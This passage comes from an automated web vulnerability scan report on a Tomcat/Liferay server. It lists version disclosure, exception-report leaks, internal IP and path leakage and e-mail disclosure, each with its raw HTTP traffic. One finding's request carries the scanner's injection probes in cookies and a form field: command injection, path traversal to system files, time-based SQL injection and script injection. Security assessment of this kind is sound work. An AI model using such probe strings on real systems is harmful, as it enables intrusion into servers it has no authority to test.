<html><head><title>Apache Tomcat/6.0.35 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;}BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status404 - /manager/</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/manager/</u></p><p><b>description</b> <u>The requested resource (/manager/)is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.35</h3></body></html>
14 / 35
1 TOTALLOW
10. Apache Coyote Version DisclosureNetsparkeridentifiedthatthetargetwebserverisdisclosingtheApacheCoyoteversioninitsHTTPresponse.ThisinformationcanhelpanattackertogainagreaterunderstandingofthesystemsinuseandpotentiallytodevelopfurtherattackstargetedatthespecificversionofApache.
ImpactAnattackermightusethedisclosedinformationtoharvestspecificsecurityvulnerabilitiesfortheversionidentified.
RemedyConfigureyourwebservertopreventinformationleakagefromtheSERVERheaderofitsHTTPresponse.
ClassificationOWASPA6CWE-200CAPEC-170WASC-45
10.1. /docshttp://161.74.91.78:8080/docs
Extracted VersionApache-Coyote/1.1
Certainty
RequestGET /docs HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 302 Moved TemporarilyDate: Fri, 25 Jan 2013 08:27:27 GMTTransfer-Encoding: chunkedServer: Apache-Coyote/1.1Location: http://161.74.91.78:8080/docs/
15 / 35
1 TOTALLOW
11. Tomcat Exception Report DisclosureNetsparkeridentifiedthatthetargetwebserverisdisclosingexceptionreportdataintheHTTPresponse.
ImpactAnattackercanobtaininformationsuchas:
Tomcatversion.PhysicalfilepathofTomcatfiles.Informationaboutthegeneratedexception.
Thisinformationmighthelpanattackertogainmoreinformationandtopotentiallyfocusonthedevelopmentoffurtherattackstothetargetsystem.
RemedyApplythefollowingconfigurationtoyourweb.xmlfiletopreventinformationleakagebyapplyingcustomerrorpages.
<error-page> <error-code>500</error-code> <location>/server_error.html</location></error-page>
Remedy ReferencesCustomErrorPagesonTomcat
ClassificationOWASPA6PCIv1.2-6.5.6PCIv2.0-6.5.5CWE-600CAPEC-214WASC-14
11.1. /examples/jsp/forward/forward.jsphttp://161.74.91.78:8080/examples/jsp/forward/forward.jsp
Certainty
RequestGET /examples/jsp/forward/forward.jsp HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/jsp/index.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784Accept-Encoding: gzip, deflate
Response…noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling thisrequest.</u></p><p><b>exception</b> <pre>org.apache.jasper.JasperException: An exception occurred processing JSP page /jsp/forward/forward.jsp at line 2623: if (percent < 0.5) {24: %>25: 26: <jsp:forward page="one.jsp"/>27: 28: <% } else { %>29: Stacktrace:org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:521) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:424)org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:313) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:260)javax.servlet.http.HttpServlet.service(HttpServlet.java:717)</pre></p><p><b>root cause</b> <pre>java.lang.IllegalStateException: Illegal to clear() when buffer size == 0org.apache.jasper.runtime.JspWriterImpl.clear(JspWriterImpl.java:147) org.apache.jasper.runtime.PageContextImpl.doForward(PageContextImpl.java:689)org.apache.jasper.runtime.PageContextImpl.forward(PageContextImpl.java:680) com.liferay.portal.kernel.servlet.PageContextWrapper.forward(PageContextWrapper.java:57)org.apache.jsp.jsp.forward.forward_jsp._jspService(forward_jsp.java:80) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)javax.servlet.http.HttpServlet.service(HttpServlet.java:717) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:388)org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:313) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:260)javax.servlet.http.HttpServlet.service(HttpServlet.java:717)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/6.0.35 logs.</u></p><HR size="1" noshade="noshade"><h3>A…
16 / 35
1 TOTALLOW
12. [Possible] Internal IP Address LeakageNetsparkerdiscoveredaninternalIPaddressinthepage.ItwasnotdeterminediftheIPaddresswasthatofthesystemitselforthatofaninternalnetwork.
ImpactThiskindofinformationcanbeusefulforanattackerwhencombinedwithothervulnerabilities.
RemedyFirstensurethatthisisnotafalsepositive.Duetothenatureoftheissue.NetsparkercouldnotconfirmthatthisIPaddresswasactuallytherealinternalIPaddressofthetargetwebserverorinternalnetwork.Ifitisthenconsiderremovingit.
ClassificationPCIv1.2-6.5.6CWE-200
12.1. /docs/monitoring.htmlhttp://161.74.91.78:8080/docs/monitoring.html
Extracted IP Address(es)192.168.1.75192.168.111.1
Certainty
RequestGET /docs/monitoring.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…basedir="."> <property name="jmx.server.name" value="localhost" /> <property name="jmx.server.port" value="9012" /> <property name="cluster.server.address"value="192.168.1.75" /> <property name="cluster.server.port" value="9025" /> <target name="state" description="Show JMX Cluster state"> <jmx:openhost="${jmx.server.name}"…ost" port="9014" username="controlRole" password="tomcat" name="Catalina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025" attribute="connected"value="true" /> </and> </waitfor> <fail if="server.timeout…ost" port="9014" username="controlRole" password="tomcat" name="Catalina:type=IDataSender,host=localhost,senderAddress=192.168.111.1,senderPort=9025" attribute="connected"value="true" /> </and> </waitfor> <fail if="server.timeout…
17 / 35
1 TOTALINFORMATION
CONFIRMED
1
13. Forbidden ResourceAccesstothisresourcehasbeendeniedbythewebserver.Thisisgenerallynotasecurityissue,andisreportedhereforinformationpurposes.
ImpactThereisnoimpactresultingfromthisissue.
13.1. /liferay-portal-6.1.0/image/ CONFIRMEDhttp://161.74.91.78:8080/liferay-portal-6.1.0/image/
RequestGET /liferay-portal-6.1.0/image/ HTTP/1.1Cache-Control: no-cacheAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: JSESSIONID=70C60A1A8A9C234A451A8DCB1F4B4F8C; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=trueAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 403 ForbiddenCache-Control: max-age=315360000, publicDate: Fri, 25 Jan 2013 08:32:10 GMTServer: Apache-Coyote/1.1Vary: Accept-EncodingETag: "0"Content-Length: 0Expires: Mon, 23 Jan 2023 08:32:10 GMT
18 / 35
1 TOTALINFORMATION
14. E-mail Address DisclosureNetsparkerfounde-mailaddressesonthewebsite.
ImpactE-mailaddressesdiscoveredwithintheapplicationcanbeusedbybothspamemailenginesandalsobruteforcetools.Furthermorevalidemailaddressesmayleadtosocialengineeringattacks.
RemedyUsegenericemailaddressessuchascontact@orinfo@forgeneralcommunications,removeuser/peoplespecifice-mailaddressesfromthewebsite,shouldthisberequiredusesubmissionformsforthispurpose.
External ReferencesWikipedia-E-MailSpam
ClassificationOWASPA6PCIv1.2-6.5.6CWE-200CAPEC-118WASC-13
14.1. /http://161.74.91.78:8080/
Found [email protected]@tomcat.apache.org
Certainty
RequestGET / HTTP/1.1Cache-Control: no-cacheAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…an introductory guide to developing web applications.</p> <p>Tomcat mailing lists are available at the Tomcat project web site:</p> <ul> <li><b><ahref="mailto:[email protected]">[email protected]</a></b> for general questions related to configuring and using Tomcat</li> <li><b><ahref="mailto:[email protected]">[email protected]</a></b> for developers working on Tomcat</li> </ul> <p>Thanks for using Tomcat!</p> <p id="footer"><img src="tomcat-power.gif" width="77" height="80" alt="Powered…
19 / 35
1 TOTALINFORMATION
15. Default Tomcat Page IdentifiedNetsparkeridentifiedadefaultTomcatpage.Thisissueisreported for information only.IfthereisanyothervulnerabilityidentifiedregardingthisresourceNetsparkerwillreportitasaseparateissue.
15.1. /examples/jsp/index.htmlhttp://161.74.91.78:8080/examples/jsp/index.html
Certainty
RequestGET /examples/jsp/index.html HTTP/1.1Cache-Control: no-cacheAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…59-1"> <meta name="GENERATOR" content="Mozilla/4.61 [en] (WinNT; I) [Netscape]"> <meta name="Author" content="Anil K. Vijendran"> <title>JSP Examples</title></head><bodybgcolor="#FFFFFF"><b><font face="Arial, Helvetica, sans-serif"><font size=+2>JSPSamples</font></font></b><p>This is a collection of samples demonstrating the usage of differentpartsof the Java Server Pages (JSP) specification. Both JSP 2.0 andJSP 1.2 examples are presented below.<p>These examples will only work when these pages are being served by aservletengine; of …
20 / 35
25 TOTALINFORMATION
16. [Possible] Internal Path Leakage (*nix)Netsparkeridentifiedaninternalpathinthedocument.
ImpactThereisnodirectimpacthoweverthisinformationcanhelpanattackereithertoidentifyothervulnerabilitiesorduringtheexploitationofotheridentifiedvulnerabilities.
RemedyFirstensurethatthisisnotafalsepositive.Duetothenatureoftheissue.Netsparkercouldnotconfirmthatthisfilepathwasactuallytherealfilepathofthetargetwebserver.
Errormessagesshouldbedisabled.Removethiskindofsensitivedatafromtheoutput.
External ReferencesOWASP-FullPathDisclosure
ClassificationPCIv1.2-6.5.6CWE-200CAPEC-118WASC-13
16.1. /docs/jasper-howto.htmlhttp://161.74.91.78:8080/docs/jasper-howto.html
Identified Internal Path(s)/bin/catalina-tasks.xml/bin/ant
Certainty
RequestGET /docs/jasper-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…ght="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre><project name="Webapp Precompilation" default="all" basedir="."> <importfile="${tomcat.home}/bin/catalina-tasks.xml"/> <target name="jspc"> <jasper validateXml="false" uriroot="${webapp.path}" webXmlFragment="${webapp.path}/WEB-INF/generated_web.xml…/void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1"bgcolor="#ffffff"><pre>$ANT_HOME/bin/ant -Dtomcat.home=<$TOMCAT_HOME> -Dwebapp.path=<$WEBAPP_PATH></pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0"vspace="0" height="1" width="1" alt="" src="./images/void.g…
16.2. /examples/servlets/servlet/CookieExamplehttp://161.74.91.78:8080/examples/servlets/servlet/CookieExample
Identified Internal Path(s)/etc/httpd/logs/error.log/etc/httpd/logs/error_log
Certainty
RequestPOST /examples/servlets/servlet/CookieExample HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/servlets/servlet/CookieExampleAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: '=3; NS1NO=3; Smith="&ping -c 26 127.0.0.1 &"; %27=3; '"--></style></script><script>netsparker(0x000964)</script>=3; ../../../../../../../../../../boot.ini=3;..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini=3; /../../../../../../../../../../boot.ini=3; file:/windows/win.ini=3; ../../../../../../../../../../windows/win.ini=3;c:\windows\win.ini=3; ../../../../../../../../../../windows/iis6.log=3; ../../../../../../../../../../proc/self/fd/2=3; ../../../../../../../../../../etc/httpd/logs/error.log=3;$Version=1; Smith="-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'"; JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784Accept-Encoding: gzip, deflateContent-Length: 105Content-Type: application/x-www-form-urlencoded
cookiename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhttpd%2flogs%2ferror_log&cookievalue=3
21 / 35
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 09:13:46 GMTServer: Apache-Coyote/1.1Set-Cookie: ../../../../../../../../../../etc/httpd/logs/error_log=3Content-Length: 1959Content-Type: text/html
<html><body bgcolor="white"><head><title>Cookies Example</title></head><body><a href="../cookies.html"><img src="../images/code.gif" …./../../../../../../../windows/iis6.log<br> Cookie Value: 3<br><br>Cookie Name: ../../../../../../../../../../proc/self/fd/2<br> Cookie Value: 3<br><br>Cookie Name: ../../../../../../../../../../etc/httpd/logs/error.log<br> Cookie Value: 3<br><br>Cookie Name: Smith<br> Cookie Value: -1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'<br><br>Cookie Name: JSESSIONID<br> Cookie Value: 8CFCC592DC40DA02412C5EFC1A18A784<br><br><P>You just sent the following cookie to your browser:<br>Name: ../../../../../../../../../../etc/httpd/logs/error_log<br>Value: 3<P>Create a cookie to send to your browser<br><form action="CookieExample" method=POST>Name: <input type=text length=20 name=cookiename><br>Value: <input type=text length=20 nam…
16.3. /docs/building.htmlhttp://161.74.91.78:8080/docs/building.html
Identified Internal Path(s)/usr/share/java/home/me/some-place-to-download-to
Certainty
RequestGET /docs/building.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…code><br> cd ${tomcat.source}<br> ant download<br> ant<br></code></p><p><b>WARNING:</b> Running "ant download" command will download libraries required to build Tomcat to the<code>/usr/share/java</code> directory by default. On a typical Linux or MacOX system, an ordinary user will not have access to write to this directory, and, even if you do, it maynot be appropriate for you to writ…n<br><br> # ----- Default Base Path for Dependent Packages -----<br> # Replace this path with the directory path where<br> # dependencies binaries should be downloaded.<br>base.path=/home/me/some-place-to-download-to<br></code></p></blockquote></td></tr></table><table cellpadding="2" cellspacing="0" border="0"><tr><td bgcolor="#525D76"><fontface="arial,helvetica.sanserif" color="#ffffff"><a name="Building wi…
16.4. /docs/security-manager-howto.htmlhttp://161.74.91.78:8080/docs/security-manager-howto.html
Identified Internal Path(s)/lib/-/lib/ext/-/bin/commons-daemon.jar/bin/tomcat-juli.jar/bin/bootstrap.jar/lib/driver.jar!/-/lib/scrape.jar!/-/bin/catalina.sh
Certainty
RequestGET /docs/security-manager-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
22 / 35
Response…==============================================// ========== SYSTEM CODE PERMISSIONS =========================================// These permissions apply to javacgrant codeBase"file:${java.home}/lib/-" { permission java.security.AllPermission;};// These permissions apply to all shared system extensionsgrant codeBase "file:${java.home}/jre/lib/ext/-" {permission java.security.AllPermission;};// These permissions apply to javac when ${java.home] points at $JAVA_HOME/jregrant codeBase "file:${java.home}/../lib/-" { permissionjava.security.AllPermission;};// These permissions apply to all shared system extensions when// ${java.home} points at $JAVA_HOME/jregrant codeBase "file:${java.home}/lib/ext/-" {permission java.security.AllPermission;};// ========== CATALINA CODE PERMISSIONS =======================================// These permissions apply to the daemon codegrant codeBase"file:${catalina.home}/bin/commons-daemon.jar" { permission java.security.AllPermission;};// These permissions apply to the logging API// Note: If tomcat-juli.jar is in${catalina.base} and not in ${catalina.home},// update this section accordingly.// grant codeBase "file:${catalina.base}/bin/tomcat-juli.jar" {..}grant codeBase"file:${catalina.home}/bin/tomcat-juli.jar" { permission java.io.FilePermission "${java.home}${file.separator}lib${file.separator}logging.properties", "read"; permissionjava.io.FilePermission "${catalina.b…file.separator}WEB-INF // ${file.separator}classes${file.separator}logging.properties", "read";};// These permissions apply to the server startup codegrant codeBase"file:${catalina.home}/bin/bootstrap.jar" { permission java.security.AllPermission;};// These permissions apply to the servlet API classes// and those that are shared across allclass loaders// located in the "lib" directorygrant codeBase "file:${catalina.home}/lib/-" { permission java.security.AllPermission;};// If using a per instance lib directory, i.e.${catalina.base}/lib,// then the following permission will need to be uncommented// grant codeBase "file:${catalina.base}/lib/-" {// permission java.security.AllPermission;// };//========== WEB APPLICATION PERMISSIONS =====================================// These permissions are granted by default to all web …grant codeBase "file:${catalina.base}/webapps/examples/WEB-INF/classes/-" {// };//// The permission granted to your JDBC driver// grant codeBase"jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar!/-" {// permission java.net.SocketPermission "dbhost.mycompany.com:5432", "connect";// };// The permission grantedto the scrape taglib// grant codeBase "jar:file:${catalina.base}/webapps/examples/WEB-INF/lib/scrape.jar!/-" {// permission java.net.SocketPermission "*.noaa.gov:80", "connect";//};</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./….gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre>$CATALINA_HOME/bin/catalina.sh start -security (Unix)%CATALINA_HOME%\bin\catalina start -security (Windows)</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0"vspace="0" height="1" width="1" alt="" src=…
16.5. /RELEASE-NOTES.txthttp://161.74.91.78:8080/RELEASE-NOTES.txt
Identified Internal Path(s)/lib/driver.jar
Certainty
RequestGET /RELEASE-NOTES.txt HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…=In order to grant security permissions to JARs located inside theweb application repository, use URLs of of the following formatin your policyfile:file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar============================Symlinking static resources:============================By default, Unix symlinks willnot work when used in a web application to linkresources located outside the w…
16.6. /docs/realm-howto.htmlhttp://161.74.91.78:8080/docs/realm-howto.html
Identified Internal Path(s)/lib/catalina.jar/bin/tomcat-juli.jar
Certainty
RequestGET /docs/realm-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…t;login-config></code>. If not specified in web.xml, the default value of <code>Authentication required</code> is used.</p><p>To use either of the above techniques,the<code>$CATALINA_HOME/lib/catalina.jar</code> and <code>$CATALINA_HOME/bin/tomcat-juli.jar</code> files will need to beon your class path to make the <code>RealmBase</code> classavailable.</p><p>Non-ASCII usernames and/or passwords are supported using<div align="left"><table border="…
16.7. /docs/ssl-howto.htmlhttp://161.74.91.78:8080/docs/ssl-howto.html
Identified Internal Path(s)
23 / 35
/bin/keytool/dev/urandom/usr/local/ssl/server.crt/usr/local/ssl/server.pem
Certainty
RequestGET /docs/ssl-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1"bgcolor="#ffffff"><pre>$JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1"alt="" src="./images/void.gif"></td></tr><tr><td height="1" wid…void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1"bgcolor="#ffffff"><pre>$JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1"alt="" src="./images/void.gif"></td></tr><tr><td height="1" wid…void.gif"></td></tr><tr><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif"></td><td height="1"bgcolor="#ffffff"><pre>$JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA \ -keystore /path/to/my/keystore</pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0"vspace="0" height="1" width="1" alt="" src="./images/void.gi…specify a source of entropy. Productive system needs a reliable source of entropybut entropy may need a lot of time to be collected therefore test systems could use no blockingentropysources like "/dev/urandom" that will allow quicker starts of Tomcat.</p><p>The final step is to configure the Connector in the<code>$CATALINA_BASE/conf/server.xml</code>file, where<code>$CATALINA_BASE</code> represents…L Coyote HTTP/1.1 Connector on port 8443 --><!--<Connector port="8443" maxThreads="200" scheme="https" secure="true" SSLEnabled="true"SSLCertificateFile="/usr/local/ssl/server.crt" SSLCertificateKeyFile="/usr/local/ssl/server.pem" clientAuth="optional" SSLProtocol="TLSv1"/>--></pre></td><td width="1"bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="./images/void.gif">…
16.8. /docs/manager-howto.htmlhttp://161.74.91.78:8080/docs/manager-howto.html
Identified Internal Path(s)/usr/local/tomcat6/webapps/manager/lib/catalina-ant.jar
Certainty
RequestGET /docs/manager-howto.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/manager/statusAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…/code> context configuration file in the<code>$CATALINA_BASE/conf/[enginename]/[hostname]</code> folder. Here is anexample:</p><pre><Context path="/manager" privileged="true"docBase="/usr/local/tomcat6/webapps/manager"></Context></pre><p>If you have Tomcat configured to support multiple virtual hosts(websites) you would need to configure aManager for each.</p><p>There are three ways to use the <st…version <strong>1.4</strong> or later.</li><li>Install the Ant distribution in a convenient directory (called ANT_HOME in the remainder of these instructions).</li><li>Copy the file<code>server/lib/catalina-ant.jar</code> from your Tomcat 6 installation into Ant's library directory (<code>$ANT_HOME/lib</code>). </li><li>Add the <code>$ANT_HOME/bin</code>directory to your <code>PATH</code> environm…
16.9. /docs/RELEASE-NOTES.txthttp://161.74.91.78:8080/docs/RELEASE-NOTES.txt
Identified Internal Path(s)/lib/driver.jar
Certainty
RequestGET /docs/RELEASE-NOTES.txt HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
24 / 35
Response…=In order to grant security permissions to JARs located inside theweb application repository, use URLs of of the following formatin your policyfile:file:${catalina.base}/webapps/examples/WEB-INF/lib/driver.jar============================Symlinking static resources:============================By default, Unix symlinks willnot work when used in a web application to linkresources located outside the w…
16.10. /docs/config/host.htmlhttp://161.74.91.78:8080/docs/config/host.html
Identified Internal Path(s)/etc/passwd
Certainty
RequestGET /docs/config/host.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/realm-howto.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…hat user's home directory on the server. You can accomplish the same thing in Catalina by using a special <strong>Listener</strong> element like this (on a Unix system that uses the<code>/etc/passwd</code> file to identify valid users):</p><div align="left"><table border="0" cellpadding="0" cellspacing="4"><tr><td height="1" width="1" bgcolor="#023264"><imgborder="0" hspace="0" vspace="0" hei…if"></td><td height="1" width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" alt="" src="../images/void.gif"></td></tr></table></div> <p>On aserver where <code>/etc/passwd</code> is not in use, you can request Catalina to consider all directories found in a specified base directory (such as <code>c:\Homes</code> in thisexample) to be considered "user home"…
16.11. /docs/appdev/processes.htmlhttp://161.74.91.78:8080/docs/appdev/processes.html
Identified Internal Path(s)/lib/catalina-ant.jar/usr/local/apache-tomcat-6.0
Certainty
RequestGET /docs/appdev/processes.html HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/docs/appdev/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
Response…many web applications you plan to develop).</p><ul><li><em>Configure the Ant custom tasks</em>. The implementation code for the Ant custom tasks is in a JAR file named<code>$CATALINA_HOME/lib/catalina-ant.jar</code>, which must be copied in to the <code>lib</code> directory of your Ant installation. <br><br></li><li><em>Define one or more Tomcatusers</em>. The <em>Manager</em> web applicati…1" width="1" alt="" src="../images/void.gif"></td><td height="1" bgcolor="#ffffff"><pre># Context path to install this application onapp.path=/hello# Tomcat 6 installationdirectorycatalina.home=/usr/local/apache-tomcat-6.0# Manager webapp username and passwordmanager.username=myusernamemanager.password=mypassword</pre></td><td width="1"bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1" a…
16.12. /docs/setup.htmlhttp://161.74.91.78:8080/docs/setup.html
Identified Internal Path(s)/usr/java/bin/jsvc/bin/bootstrap.jar/bin/commons-daemon-1.0.x-native-src/unix/native/Tomcat5.sh/etc/init.d
Certainty25 / 35
